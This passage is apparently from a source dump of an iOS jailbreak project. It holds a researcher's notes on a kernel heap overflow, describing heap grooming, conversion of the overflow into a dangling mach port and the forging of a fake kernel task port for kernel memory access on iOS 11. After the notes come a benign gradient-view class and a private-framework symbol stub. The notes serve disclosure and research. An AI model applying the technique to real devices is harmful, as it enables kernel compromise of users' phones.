  ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
  if (pack_invalid) {
    /* Only report the attributes that are valid */
    ab.actual.commonattr &= ab.valid.commonattr;
    ab.actual.volattr &= ab.valid.volattr;
  }
  bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
}

There's no check that the allocated buffer is big enough to hold at least that: the bcopy writes sizeof(ab.actual)
bytes starting 4 bytes into a buffer that a small user-supplied bufferSize lets you shrink down to the smallest
(16-byte) allocation, so the tail of ab.actual lands past the end of the allocation.

Exploitation:
I hope to publish a longer-form write-up of this; these are some rough notes on how the exploit works:

The bug gives you the ability to write 8 zero bytes off the end of a kalloc.16 allocation. Whilst it looks like you
might be able to control a few bits in those bytes I'm not sure you actually can, so I focused on exploiting it
as if it were writing a NULL pointer off the end.

This is a pretty limited primitive, so the first step is to enumerate the things you could do with it:
 * target a reference count, trying to turn the overflow into a UaF bug
 * target a lock, trying to turn the overflow into a race condition bug
 * target a pointer, trying to leak a reference count
 * target a validated data structure where 0 is an interesting value to change something to

In the end I chose the first option.
There are then two further requirements:
 * the target needs a reference count in its first 8 bytes
 * the target has to be overflowable into from kalloc.16

I chose to target struct ipc_port, which has a reference count field as its second dword, thus fulfilling the
first requirement. It is however not allocated in kalloc.16; instead it lives in its own zone (ipc_ports).

This means we have to align a kalloc.16 zone block just before an ipc_ports one, then overflow out of the
last kalloc.16 allocation in the kalloc.16 block into the first one in ipc_ports.

There are two tricks we can use to make this easier:
 1) freelist reversal
 2) safely-overflowable allocations

Freelist Reversal:
zone allocations will come first from intermediate (partially full) pages. This means that if we just start freeing and
allocating k.16 objects somewhere in the middle of the groom they won't be re-used until
the current intermediate page is either full or empty.

this provides a challenge because a fresh page's freelist is filled semi-randomly, such that
its allocations will go from the inside to the outside:

| 9 8 6 5 2 1 3 4 7 10 | <-- example "randomized" allocation order from a fresh all-free page

this means that our final intermediate k.16 and ports pages will look a bit like this:

| - - - 5 2 1 3 4 - - | - - - 4 1 2 3 5 - - |
       kalloc.16             ipc_ports

if we use the overflow to corrupt a freelist entry we'll panic when it gets allocated, so we
need to avoid that

the trick is that by controlling the allocation and free order we can reverse the freelists such that
the final intermediate pages will look more like this:
| 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 |
       kalloc.16             ipc_ports

at this point we're much more likely to be able to free a kalloc.16 and realloc it for the overflow
such that we can hit the first qword of an ipc_port.

Safely-Overflowable allocations:
since there are likely to be many candidate allocations we're going to have to overflow out of before we hit the
target one (which is right at the end, just before the ipc_port) we need to make sure that the allocated objects
on the kalloc.16 page are safe to corrupt with a NULL pointer.

I use mach message ool_port descriptors for this, as NULL is a valid value there.

Exploit Flow:
We do the groom to reverse the kalloc.16 freelists and start trying to overflow into an ipc_port.

We know the approximate range of mach port names which contain the to-be-corrupted port; after each overflow attempt
we check each of these ports to see if the port was corrupted. A side-effect of successful corruption is that the
port's io_active flag will be set to zero. We can detect this without causing side-effects using the
mach_port_kobject MIG method.

Once we find the corrupted port we need to cause a reference to be taken and dropped on it; and, more importantly, we
need the code path which does this to not check the io_active flag. mach_port_set_attributes will do this for us.

Now we've turned our NULL pointer write off the end of a kalloc.16 into a dangling mach port :)

We cause a zone gc, aiming to get the port's memory reused as a kalloc.4096 page. We first get it reused as an ool_ports
descriptor where the ip_context field overlaps with a send right we send ourselves to a canary port. This lets us
learn the approximate address of our objects in the kernel. We then replace the ool_desc with a pipe buffer,
and with a bit of fiddling are able to work out where the dangling mach port is in memory.

We craft a fake kernel task port in there, then clean up.

Reliability:
The exploit does work, which was my goal :) Reliability is something like 30% maybe; it all hinges on how quickly you can do the initial overflow
and test loop. If something else comes in and allocates or frees in kalloc.16 you increase the probability that you
corrupt a freelist entry or something else and will panic. Note that this is what failure looks like: a bad
attempt is not silently retried, it panics the device.

I'm sure the exploit can be made more reliable; I've only got it to the point where I've demonstrated that this
bug is exploitable. If you want to take this as a starting point and demonstrate how to improve reliability I'd love
to read a blog post! I imagine this would involve actually monitoring kalloc.16 allocations and understanding what
the failure cases are and how they can be prevented.

Success rates seem to be highest when the device has been rebooted and left idle for a bit.

Cleanup:
If the exploit does work it should clean up after itself and not panic the device. The fake kernel task port will stay alive.

Use the functions in kmem.h to read and write kernel memory. Persist a send-right to tfp0 in there if you want to keep
kernel memory access after this process exits.

I've tested on: iPod Touch 6G, iPhone 6S, iPhone SE, iPhone 7, iPhone 8
It should work on iOS 11 through iOS 11.3.1
--------------------------------------------------------------------------------
/Rollectra/RollectraGradientView.h:
--------------------------------------------------------------------------------
#import <UIKit/UIKit.h>

/// A UIView whose backing layer is a vertical two-stop gradient (configured from the storyboard).
@interface RollectraGradientView : UIView

@end
--------------------------------------------------------------------------------
/Rollectra/RollectraGradientView.m:
--------------------------------------------------------------------------------
#import "RollectraGradientView.h"
#import <QuartzCore/QuartzCore.h>

@implementation RollectraGradientView

/// Backing layer class. Returning CAGradientLayer here is what makes the cast of
/// self.layer in -initWithCoder: valid.
+ (Class)layerClass {
    return [CAGradientLayer class];
}

/// Storyboard initialiser: paints a top-to-bottom gradient between two fixed colours
/// onto the view's backing layer.
- (instancetype)initWithCoder:(NSCoder *)aDecoder {
    if (!(self = [super initWithCoder:aDecoder])) {
        return nil;
    }

    // Gradient stops, expressed as 0-255 RGB components (values kept exactly as shipped).
    UIColor *topColor = [UIColor colorWithRed:58.0f/255.0f green:70.0f/255.0f blue:91.0f/255.0f alpha:1.0f];
    UIColor *bottomColor = [UIColor colorWithRed:83.0f/255.0f green:105.2f/255.0f blue:118.3f/255.0f alpha:1.0f];

    CAGradientLayer *gradient = (CAGradientLayer *)self.layer; // safe: see +layerClass
    gradient.startPoint = CGPointMake(0.5, 0);                 // top centre ...
    gradient.endPoint = CGPointMake(0.5, 1);                   // ... to bottom centre
    gradient.colors = @[(id)topColor.CGColor, (id)bottomColor.CGColor];

    return self;
}

/*
// Only override drawRect: if you perform custom drawing.
// An empty implementation adversely affects performance during animation.
24 | - (void)drawRect:(CGRect)rect { 25 | // Drawing code 26 | } 27 | */ 28 | 29 | @end 30 | -------------------------------------------------------------------------------- /Rollectra/SpringBoardServices.framework/SpringBoardServices.tbd: -------------------------------------------------------------------------------- 1 | --- 2 | archs: [ armv7, armv7s, arm64 ] 3 | platform: ios 4 | install-name: /System/Library/PrivateFrameworks/SpringBoardServices.framework/SpringBoardServices 5 | current-version: 1 6 | compatibility-version: 1 7 | exports: 8 | - archs: [ armv7, armv7s, arm64 ] 9 | symbols: [ _ADClientAddValueForScalarKey, _ADMonotonicTimeGetCurrent, 10 | _ADPushTimeIntervalForDistributionKeySinceStartTime, _NSStringFromAnalyticsEventType, 11 | _NSStringFromAnalyticsQueryName, _SBActivateAssistantWithContext, _SBAddAlertItemsSuppressionAssertion, 12 | _SBAddBiometricAssertion, _SBAddDownloadingIconForDisplayIdentifier, 13 | _SBAddWallpaperAnimationSuspensionAssertion, _SBAddWebClipToHomeScreen, 14 | _SBAppSetMinimumBackgroundFetchInterval, _SBAppSwitcherServiceRegister, 15 | _SBApplicationDisplayIdentifiers, _SBApplicationMostElevatedStateForProcessIDKey, 16 | _SBApplicationNotificationStateChanged, _SBApplicationRequestedDeviceUnlock, 17 | _SBApplicationStateBeginGeneratingChangeNotifications, _SBApplicationStateDisplayIDKey, 18 | _SBApplicationStateEndGeneratingChangeNotifications, _SBApplicationStateGetDescription, 19 | _SBApplicationStateKey, _SBApplicationStateProcessIDKey, 20 | _SBApplicationStateRunningReasonAssertionIdentifierKey, 21 | _SBApplicationStateRunningReasonAssertionReasonKey, _SBApplicationStateRunningReasonsKey, 22 | _SBAuthLoggingSubsystem, _SBAutoLockTimerCategoryKey, _SBAutoLockTimerFiredNotification, 23 | _SBBiometricLoggingSubsystem, _SBBundlePathForDisplayIdentifier, 24 | _SBCarTriggerUnhandledBackButtonAction, _SBCardItemsControllerClientInterface, 25 | _SBCardItemsControllerServerInterface, _SBClearWallpaperAsset, _SBDataReset, 
_SBDeactivateAssistant, 26 | _SBDeactivateReachability, _SBDidDismissMiniAlert, _SBDimScreen, _SBDismissSheetView, 27 | _SBDisplayIdentifierForPID, _SBDisplayIdentifiersForPID, 28 | _SBDisplayLayoutBacklightTransitionReasonACPowerChange, _SBDisplayLayoutBacklightTransitionReasonAlert, 29 | _SBDisplayLayoutBacklightTransitionReasonBoot, _SBDisplayLayoutBacklightTransitionReasonCar, 30 | _SBDisplayLayoutBacklightTransitionReasonChargingAccessoryChange, 31 | _SBDisplayLayoutBacklightTransitionReasonCoverSheet, 32 | _SBDisplayLayoutBacklightTransitionReasonExternalAppRequest, 33 | _SBDisplayLayoutBacklightTransitionReasonExternalRequest, 34 | _SBDisplayLayoutBacklightTransitionReasonHomeButton, 35 | _SBDisplayLayoutBacklightTransitionReasonIdleTimer, _SBDisplayLayoutBacklightTransitionReasonKeyboard, 36 | _SBDisplayLayoutBacklightTransitionReasonLanguageChange, 37 | _SBDisplayLayoutBacklightTransitionReasonLiftToWake, 38 | _SBDisplayLayoutBacklightTransitionReasonLockButton, _SBDisplayLayoutBacklightTransitionReasonLogout, 39 | _SBDisplayLayoutBacklightTransitionReasonNotification, 40 | _SBDisplayLayoutBacklightTransitionReasonNotificationCenter, 41 | _SBDisplayLayoutBacklightTransitionReasonOtherButton, _SBDisplayLayoutBacklightTransitionReasonPlugin, 42 | _SBDisplayLayoutBacklightTransitionReasonPocketState, _SBDisplayLayoutBacklightTransitionReasonPrefix, 43 | _SBDisplayLayoutBacklightTransitionReasonProgrammatic, _SBDisplayLayoutBacklightTransitionReasonProx, 44 | _SBDisplayLayoutBacklightTransitionReasonRestoring, 45 | _SBDisplayLayoutBacklightTransitionReasonSOSDismiss, _SBDisplayLayoutBacklightTransitionReasonSiri, 46 | _SBDisplayLayoutBacklightTransitionReasonSmartCover, 47 | _SBDisplayLayoutBacklightTransitionReasonSpringBoardRequest, 48 | _SBDisplayLayoutBacklightTransitionReasonTouch, 49 | _SBDisplayLayoutBacklightTransitionReasonUnknownUserEvent, 50 | _SBDisplayLayoutBacklightTransitionReasonVolumeButton, _SBDisplayLayoutTransitionReasonAccessibility, 51 | 
_SBDisplayLayoutTransitionReasonAppSwitcher, _SBDisplayLayoutTransitionReasonBreadcrumb, 52 | _SBDisplayLayoutTransitionReasonCarPlay, _SBDisplayLayoutTransitionReasonCommandTab, 53 | _SBDisplayLayoutTransitionReasonControlCenter, _SBDisplayLayoutTransitionReasonExternalRequest, 54 | _SBDisplayLayoutTransitionReasonFloatingApplication, _SBDisplayLayoutTransitionReasonFloatingDock, 55 | _SBDisplayLayoutTransitionReasonFloatingDockRecents, _SBDisplayLayoutTransitionReasonHomeScreen, 56 | _SBDisplayLayoutTransitionReasonLockScreen, _SBDisplayLayoutTransitionReasonNotification, 57 | _SBDisplayLayoutTransitionReasonNotificationCenter, _SBDisplayLayoutTransitionReasonPrefix, 58 | _SBDisplayLayoutTransitionReasonSideAppSwitcher, _SBDisplayLayoutTransitionReasonSiri, 59 | _SBDisplayLayoutTransitionReasonSpotlight, _SBDisplayLayoutTransitionReasonSystemGesture, 60 | _SBDisplayLayoutTransitionReasonWidget, _SBEnableLockScreenBundle, _SBFlashColor, 61 | _SBFrontmostApplicationDisplayIdentifier, _SBGetActiveApplicationStatusBarOrientation, 62 | _SBGetApplicationNetworkFlags, _SBGetApplicationUsesBackgroundNetwork, _SBGetBatteryAwakeTime, 63 | _SBGetBatteryUsageTimesInSeconds, _SBGetCanAddIcons, _SBGetCurrentBacklightFactor, 64 | _SBGetCurrentHomeScreenImage, _SBGetCurrentLockScreenImage, _SBGetDisplayIdentifiers, 65 | _SBGetDisplayIdentifiersForExternalAccessoryProtocols, 66 | _SBGetExternalAccessoryProtocolsForDisplayIdentifier, _SBGetFlattenedIconState, 67 | _SBGetHomeScreenIconMetrics, _SBGetIconPNGData, _SBGetIconState, _SBGetInterfaceOrientation, 68 | _SBGetIsAlive, _SBGetMediaVolume, _SBGetNowPlayingAppBundleIdentifier, _SBGetPendingIconState, 69 | _SBGetRecentSleepsWakes, _SBGetRingerSwitchState, _SBGetScheduledPowerEvents, _SBGetScreenLockStatus, 70 | _SBGetShowingMediaControls, _SBGetShowingMediaHUDAlert, _SBGetSystemVolumeHUDEnabled, 71 | _SBGetWallpaperLegibilitySettings, _SBGetWallpaperOptions, _SBGetWallpaperPreview, 72 | _SBGetWallpaperPreviewSurface, 
_SBHasPendingOrVisibleAlerts, _SBInterruptKeybagRefetch, 73 | _SBIsNamedRemoteAlertCurrentlyActive, _SBIsReachabilityEnabled, _SBIsSystemApplication, 74 | _SBIsSystemApplicationPID, _SBLocalizedApplicationNameForDisplayIdentifier, _SBLockDevice, 75 | _SBLockDeviceAndFeatures, _SBLogAnalytics, _SBLogAuthenticationAssertions, 76 | _SBLogAuthenticationController, _SBLogAuthenticationKeybag, _SBLogAuthenticationModel, 77 | _SBLogAuthenticationRequests, _SBLogAutoLaunching, _SBLogBiometricResource, _SBLogCommon, 78 | _SBLogCoverSheet, _SBLogDashBoard, _SBLogDashBoardBackdrop, _SBLogDashBoardCallToActionLabel, 79 | _SBLogDashBoardHostedAppViewController, _SBLogDashBoardIrisRecognizer, 80 | _SBLogDashBoardQuickNoteRecognizer, _SBLogDashBoardScrollGestures, _SBLogDoNotDisturbWhileDriving, 81 | _SBLogDockRecents, _SBLogIconDragging, _SBLogIdleTimer, _SBLogLiquidDetection, 82 | _SBLogLockScreenBiometricCoordinator, _SBLogLockScreenBiometricWalletPreArm, 83 | _SBLogLockScreenMesaHomeButtonPasscodeRecognizer, 84 | _SBLogLockScreenMesaHomeButtonSuppressAfterUnlockRecognizer, _SBLogLockScreenMesaUnlockBehaviors, 85 | _SBLogLockScreenMesaWalletPreArm, _SBLogLockScreenNowPlaying, _SBLogMedusaDropDestination, 86 | _SBLogWallet, _SBLoggingSubsystem, _SBOverrideDisplayedDate, _SBPresentPowerDownUI, 87 | _SBPresentRemoteAlert, _SBPresentSheetView, _SBProgrammaticSwitchAppGestureMoveToLeft, 88 | _SBProgrammaticSwitchAppGestureMoveToRight, _SBReboot, _SBRegisterRemoteView, 89 | _SBReloadIconForIdentifier, _SBRemoveWebClipFromHomeScreen, _SBReturnToPreviousAppAtSpecifiedTime, 90 | _SBSAcquireBiometricUnlockSuppressionAssertion, _SBSActivateAssistant, 91 | _SBSActivateAssistantWithContext, _SBSAlertItemsSuppressionAssertionCreate, 92 | _SBSAlertItemsSuppressionAssertionGetTypeID, _SBSAppDragPrivateTypeIdentifier, 93 | _SBSAppLaunchOriginSpotlight, _SBSAppSwitcherQuitAppNotification, _SBSAppSwitcherServiceRegister, 94 | _SBSAppSwitcherServiceRegistrationGetBundleID, 
_SBSAppSwitcherServiceRegistrationGetIsValid, 95 | _SBSAppSwitcherServiceRegistrationGetTypeID, 96 | _SBSAppSwitcherServiceRegistrationGetViewControllerClassName, _SBSApplicationCanBeLaunched, 97 | _SBSApplicationLaunchFromURLOptionUnlockDeviceKey, 98 | _SBSApplicationLaunchOptionAppLinkOpenStrategyChangedKey, 99 | _SBSApplicationLaunchOptionBreadcrumbBundleIdKey, 100 | _SBSApplicationLaunchOptionBrowserActivationWithNoURLKey, 101 | _SBSApplicationLaunchOptionBrowserReuseTabKey, _SBSApplicationLaunchOptionLaunchInClassicModeKey, 102 | _SBSApplicationLaunchOptionLaunchSuspendedKey, _SBSApplicationLaunchOptionPromptUnlockKey, 103 | _SBSApplicationLaunchOptionRevealIconKey, _SBSApplicationLaunchOptionUnlockDeviceKey, 104 | _SBSApplicationLaunchOptionUpdateAppLinkOpenStrategyKey, _SBSApplicationLaunchingErrorString, 105 | _SBSApplicationRemovabilityDescription, _SBSApplicationServiceIdentifier, 106 | _SBSApplicationShortcutCustomImageIconDataTypeKey, _SBSApplicationShortcutCustomImageIconImageDataKey, 107 | _SBSApplicationShortcutCustomImageIconIsTemplateKey, 108 | _SBSApplicationShortcutItemActivationModeForString, 109 | _SBSApplicationShortcutServiceCustomImageEntitlement, 110 | _SBSApplicationShortcutServiceFullAccessEntitlement, _SBSApplicationShortcutSystemIconTypeForString, 111 | _SBSApplicationTerminationAssertionCreate, _SBSApplicationTerminationAssertionCreateWithError, 112 | _SBSApplicationTerminationAssertionErrorString, 113 | _SBSApplicationTerminationAssertionGetDisplayIdentifier, _SBSApplicationTerminationAssertionGetIsValid, 114 | _SBSApplicationTerminationAssertionGetTypeID, _SBSApplicationTerminationAssertionInvalidate, 115 | _SBSAreMediaControlsShowing, _SBSAssistantActivationContextBundleIDKey, 116 | _SBSBacklightChangeSourceForDisplayLayoutTransitionReason, 117 | _SBSBiometricsServiceUnlockSuppressionAssertionEntitlement, 118 | _SBSBundleIdentifierToPushSettingsUnarchiveFromData, _SBSCleanupClientEntitlementEnforcementPort, 119 | 
_SBSConvertOpenApplicationSBSKeysToFBSKeysIfNecessary, _SBSCopyApplicationDisplayIdentifiers, 120 | _SBSCopyBundleInfoValueForKeyAndProcessID, _SBSCopyBundlePathForDisplayIdentifier, 121 | _SBSCopyDisplayIdentifierForProcessID, _SBSCopyDisplayIdentifiers, 122 | _SBSCopyDisplayIdentifiersForExternalAccessoryProtocol, _SBSCopyDisplayIdentifiersForProcessID, 123 | _SBSCopyExecutablePathForDisplayIdentifier, _SBSCopyExternalAccessoryProtocolsForDisplayIdentifier, 124 | _SBSCopyFrontmostApplicationDisplayIdentifier, _SBSCopyIconImagePNGDataForDisplayIdentifier, 125 | _SBSCopyIconImagePathForDisplayIdentifier, _SBSCopyInfoForApplicationWithProcessID, 126 | _SBSCopyLocalizedApplicationNameForDisplayIdentifier, _SBSCopyNowPlayingAppBundleIdentifier, 127 | _SBSCreateClientEntitlementEnforcementPort, _SBSCreateCompassCalibrationHUDAssertion, 128 | _SBSDeactivateAssistant, _SBSDeactivateAssistantBySlidingOverTopAppAnimation, 129 | _SBSDisplayLayoutBacklightTransitionReasonForBacklightChangeSource, 130 | _SBSDisplayLayoutElementAppSwitcherIdentifier, _SBSDisplayLayoutElementCarPlayOEMIdentifier, 131 | _SBSDisplayLayoutElementFloatingDockIdentifier, _SBSDisplayLayoutElementHomeScreenIdentifier, 132 | _SBSDisplayLayoutElementLockScreenNavigationIdentifier, _SBSDisplayLayoutElementLoginIdentifier, 133 | _SBSDisplayLayoutElementNowPlayingIdentifier, _SBSDisplayLayoutElementPasscodeIdentifier, 134 | _SBSDisplayLayoutElementSideSwitcherIdentifier, _SBSDisplayLayoutElementSpotlightIdentifier, 135 | _SBSDisplayLayoutElementTodayViewIdentifier, _SBSDisplayLayoutRoleDescription, 136 | _SBSDisplayLayoutRoleIsDefined, _SBSEventObserverEventContinuityUIBecameVisible, 137 | _SBSEventObserverEventContinuityUIWasObscured, _SBSEventObserverEventDimmed, 138 | _SBSEventObserverEventRemoteAlertActivated, _SBSEventObserverEventRemoteAlertDeactivated, 139 | _SBSEventObserverEventSignificantTimeChange, _SBSEventObserverEventUndimmed, 140 | _SBSEventObserverEventUnlocked, 
_SBSEventObserverGetValueForState, _SBSEventObserverInitialize, 141 | _SBSEventObserverStartObservingEvent, _SBSEventObserverStateContinuityUIIsVisible, 142 | _SBSEventObserverStateDimmedForLock, _SBSEventObserverStopObservingAllEvents, 143 | _SBSEventObserverStopObservingEvent, _SBSGetApplicationState, 144 | _SBSGetMostElevatedApplicationStateForProcessID, _SBSGetNowRecordingPid, _SBSGetScreenLockStatus, 145 | _SBSGetSideSwitchPreference, _SBSHardwareButtonServiceEventConsumerEntitlement, 146 | _SBSHardwareButtonServiceHomeHardwareButtonHintSuppressionEntitlement, _SBSInterruptKeybagRefetch, 147 | _SBSIsMediaHUDAlertShowing, _SBSIsReachabilityEnabled, _SBSIsSystemApplication, 148 | _SBSIsSystemApplicationPID, _SBSLaunchApplicationForDebugging, 149 | _SBSLaunchApplicationForDebuggingWithOptions, _SBSLaunchApplicationWithIdentifier, 150 | _SBSLaunchApplicationWithIdentifierAndLaunchOptions, _SBSLaunchApplicationWithIdentifierAndURL, 151 | _SBSLaunchApplicationWithIdentifierAndURLAndLaunchOptions, 152 | _SBSLocalNotificationWhitelistedUnarchiveFromData, _SBSLockDevice, 153 | _SBSOpenApplicationEnvironmentSecureOnLockScreen, _SBSOpenApplicationLaunchOriginShortcutItem, 154 | _SBSOpenApplicationLayoutRolePrimary, _SBSOpenApplicationLayoutRoleSideLarge, 155 | _SBSOpenApplicationLayoutRoleSideNarrow, _SBSOpenApplicationOptionKeyAdditionalApplications, 156 | _SBSOpenApplicationOptionKeyLaunchEnvironment, _SBSOpenApplicationOptionKeyLayoutRole, 157 | _SBSOpenDataActivationURL, _SBSOpenSensitiveURL, _SBSOpenSensitiveURLAndUnlock, 158 | _SBSOpenURLOptionKeyUseLiveContentDuringTransition, _SBSOverrideDisplayedDate, _SBSPresentPowerDownUI, 159 | _SBSProcessAssertionCopyIdentifier, _SBSProcessAssertionCreateForPID, 160 | _SBSProcessAssertionGetNameForReason, _SBSProcessAssertionGetTypeID, _SBSProcessAssertionIsValid, 161 | _SBSProcessAssertionSetFlags, _SBSProcessAssertionSetInvalidationCallBack, 162 | _SBSProcessIDForDisplayIdentifier, 
_SBSRegisterDisplayIdentifiersChangedBlock, 163 | _SBSRemoteAlertEntitlement, _SBSRemoteAlertHandleInvalidationErrorDescription, 164 | _SBSRemoteAlertHandleInvalidationErrorDomain, _SBSRemoteAlertServiceIdentifier, 165 | _SBSRemoteCarAlertEntitlement, _SBSRemoteNotificationTopicsWhitelistedUnarchiveFromData, 166 | _SBSRemoteNotificationWhitelistedUnarchiveFromData, _SBSRequestPasscodeUnlockAlertUI, 167 | _SBSRequestPasscodeUnlockUI, _SBSRequiredContextIdsForMedusaDragAndDropForSpotlightOnly, 168 | _SBSSecureAppAssertionErrorDomain, _SBSServerPortHelper, _SBSSetAlertSuppressionContexts, 169 | _SBSSetAlertSuppressionContextsBySectionIdentifier, _SBSSetAllApplicationsShowProgress, 170 | _SBSSetAssistantRecognitionStrings, _SBSSetInterceptsMenuButton, _SBSSetInterceptsMenuButtonForever, 171 | _SBSSetNowPlayingHUDDisabled, _SBSSetNowRecordingPid, _SBSSetReachabilityEnabled, 172 | _SBSSetRequiredContextIdsForMedusaDragAndDropForSpotlightOnly, _SBSSetSideSwitchPreference, 173 | _SBSSetStatusBarShowsActivity, _SBSSetStatusBarShowsActivityForApplication, 174 | _SBSSetStatusBarShowsOverridesForRecording, _SBSSetStatusBarShowsSyncActivity, _SBSSetTypingActive, 175 | _SBSSetVoiceRecognitionAudioInputPaths, _SBSShutDown, _SBSSpringBoardBackgroundServerPort, 176 | _SBSSpringBoardBlockableServerPort, _SBSSpringBoardIconGenerationServerPort, _SBSSpringBoardServerPort, 177 | _SBSStatusBarStyleOverridesAssertionClientInterface, _SBSStatusBarStyleOverridesCoordinatorErrorDomain, 178 | _SBSStatusBarStyleOverridesCoordinatorErrorFailedEntitlementCheckDescription, 179 | _SBSStatusBarStyleOverridesCoordinatorErrorFailedExistingCoordinatorDescription, 180 | _SBSStatusBarStyleOverridesCoordinatorErrorProcessAlreadyRegisteredCoordinatorDescription, 181 | _SBSStatusBarStyleOverridesCoordinatorErrorStyleOverrideKey, _SBSSuspendFrontmostApplication, 182 | _SBSSystemServiceIdentifier, _SBSTagTouchForTypingMenu, _SBSThermalWarningAssertionCreateForBundleID, 183 | _SBSUIActivateRemoteAlert, 
_SBSUIActivateRemoteAlertWithLifecycleNotifications, 184 | _SBSUIAppDeactivateReachability, _SBSUIAppSetMinimimumBackgroundFetchInterval, 185 | _SBSUIAppSetWantsLockButtonEvents, _SBSUIAppSetWantsVolumeButtonEvents, 186 | _SBSUIAppStarkTriggerUnhandledBackButtonAction, _SBSUIAppSuspend, 187 | _SBSUIIsNamedRemoteAlertCurrentlyActive, _SBSUINullNotificationName, 188 | _SBSUIRemoteAlertOptionActivateForAssistant, _SBSUIRemoteAlertOptionActivateFromAppSwitcher, 189 | _SBSUIRemoteAlertOptionActivateFromStatusBarTap, _SBSUIRemoteAlertOptionActivityContinuationIdentifier, 190 | _SBSUIRemoteAlertOptionAllowCFUserNotificationsOnTop, _SBSUIRemoteAlertOptionCarDisplay, 191 | _SBSUIRemoteAlertOptionCustomActivationReason, _SBSUIRemoteAlertOptionDisableAnimatedTransition, 192 | _SBSUIRemoteAlertOptionDisableFadeInAnimation, _SBSUIRemoteAlertOptionDismissWithHomeButton, 193 | _SBSUIRemoteAlertOptionDismissalAnimationStyle, _SBSUIRemoteAlertOptionEndingCallForUILock, 194 | _SBSUIRemoteAlertOptionHasTranslucentBackground, 195 | _SBSUIRemoteAlertOptionImpersonatesApplicationBundleID, _SBSUIRemoteAlertOptionInitialBackgroundStyle, 196 | _SBSUIRemoteAlertOptionLaunchingInterfaceOrientation, _SBSUIRemoteAlertOptionLaunchingObscured, 197 | _SBSUIRemoteAlertOptionPerformDeferredUIUnlock, _SBSUIRemoteAlertOptionReturnFromLockScreen, 198 | _SBSUIRemoteAlertOptionStark, _SBSUIRemoteAlertOptionStatusBarStyle, 199 | _SBSUIRemoteAlertOptionSuppressSiri, _SBSUIRemoteAlertOptionSwipeDismissalStyle, 200 | _SBSUIRemoteAlertOptionUserInfo, _SBSUIRemoteAlertOptionViewControllerClass, 201 | _SBSUIRemoteAlertOptionWantsWallpaperTunnel, _SBSUndimScreen, 202 | _SBSUserNotificationSettingsWhitelistedUnarchiveFromData, _SBSWallpaperFetchServiceEntitlement, 203 | _SBSWallpaperModificationServiceEntitlement, _SBSWallpaperServiceIdentifier, 204 | _SBSWatchdogAssertionCancel, _SBSWatchdogAssertionCreateForPID, 205 | _SBSWatchdogAssertionGetRenewalInterval, _SBSWatchdogAssertionGetTypeID, 
_SBSWatchdogAssertionRenew, 206 | _SBScreenTimeCategoryKey, _SBScreenTimeTrackingChangedNotification, 207 | _SBScrollToIconWithDisplayIdentifier, _SBSetAlertSuppressionContexts, 208 | _SBSetAlertSuppressionContextsBySectionIdentifier, _SBSetAllApplicationsShowProgress, 209 | _SBSetAllApplicationsShowSyncIndicator, _SBSetAppIsConnectedToEA, _SBSetApplicationBadgeNumber, 210 | _SBSetApplicationBadgeString, _SBSetApplicationNetworkFlags, _SBSetApplicationShowsProgress, 211 | _SBSetApplicationUsesBackgroundNetwork, _SBSetAssistantRecognitionStrings, _SBSetDisableNowPlayingHUD, 212 | _SBSetIconState, _SBSetInterceptsMenuButton, _SBSetMediaVolume, _SBSetNowPlayingInformation, 213 | _SBSetProceduralWallpaper, _SBSetReachabilityEnabled, _SBSetShowsOverridesForRecording, 214 | _SBSetShowsProgress, _SBSetSuspensionAnimationDelay, _SBSetSystemVolumeHUDEnabled, _SBSetTypingActive, 215 | _SBSetVoiceControlEnabled, _SBSetVoiceRecognitionAudioInputPaths, _SBSetWallpaperAsset, 216 | _SBSetWallpaperImageForLocations, _SBSetWallpaperImageSurfaceForLocations, _SBSetWallpaperVariant, 217 | _SBSetWantsLockButtonEvents, _SBSetWantsVolumeButtonEvents, _SBShowNetworkPromptsIfNecessary, 218 | _SBShowTTYPromptForNumber, _SBShutDown, _SBStarkNowPlayingIdentifier, _SBStarkOEMIdentifier, 219 | _SBStatusBarStyleOverridesAssertionServerInterface, _SBSuspend, _SBSuspendFrontmostApp, 220 | _SBTagTouchForTypingMenu, _SBUnregisterRemoteView, _SBUserNotificationAlertMessageDelimiterKey, 221 | _SBUserNotificationAllowInCarKey, _SBUserNotificationAllowInLoginWindow, 222 | _SBUserNotificationAllowInSetupKey, _SBUserNotificationAllowInStarkKey, 223 | _SBUserNotificationAllowLockscreenDismissalKey, _SBUserNotificationAllowMenuButtonDismissal, 224 | _SBUserNotificationAllowedApplicationsKey, _SBUserNotificationAlternateButtonPresentationStyleKey, 225 | _SBUserNotificationAttachmentImagePath, _SBUserNotificationBehavesSuperModally, 226 | _SBUserNotificationButtonTagForUnlockActionKey, 
_SBUserNotificationDefaultButtonPresentationStyleKey, 227 | _SBUserNotificationDefaultButtonTag, _SBUserNotificationDefaultResponseLaunchBundleID, 228 | _SBUserNotificationDefaultResponseLaunchURL, _SBUserNotificationDisableIdleSleepWhileVisible, 229 | _SBUserNotificationDismissOnLock, _SBUserNotificationDismissesOverlaysInLockScreen, 230 | _SBUserNotificationDisplayActionButtonOnLockScreen, _SBUserNotificationDontDismissOnUnlock, 231 | _SBUserNotificationExtensionIdentifierKey, _SBUserNotificationExtensionItemsKey, 232 | _SBUserNotificationForcesModalAlertAppearance, _SBUserNotificationGroupsTextFields, 233 | _SBUserNotificationHideButtonsInAwayView, _SBUserNotificationIconImagePath, 234 | _SBUserNotificationLockScreenAlertHeaderKey, _SBUserNotificationLockScreenAlertMessageDelimiterKey, 235 | _SBUserNotificationLockScreenAlertMessageKey, _SBUserNotificationOneButtonPerLine, 236 | _SBUserNotificationOtherButtonPresentationStyleKey, _SBUserNotificationPendInSetupIfNotAllowedKey, 237 | _SBUserNotificationPendWhileKeyBagLockedKey, _SBUserNotificationRemoteServiceBundleIdentifierKey, 238 | _SBUserNotificationRemoteViewControllerClassNameKey, _SBUserNotificationSoundAlertTopicKey, 239 | _SBUserNotificationSoundAlertTypeKey, _SBUserNotificationSoundRepeatDurationKey, 240 | _SBUserNotificationSoundVibrationPatternKey, _SBUserNotificationSystemSoundBehaviorKey, 241 | _SBUserNotificationSystemSoundIDKey, _SBUserNotificationTextAutocapitalizationType, 242 | _SBUserNotificationTextAutocorrectionType, _SBUserNotificationUsesUndoStyle, _SBWillDismissMiniAlert, 243 | _SBWillDisplayMiniAlert, __SBApplicationStateGetMonitor, __SBFScreenTimeNameForCategory, 244 | __SBFScreenTimePostExternalChangeNotification, __SBFScreenTimeRegisterForExternalChangeNotification, 245 | 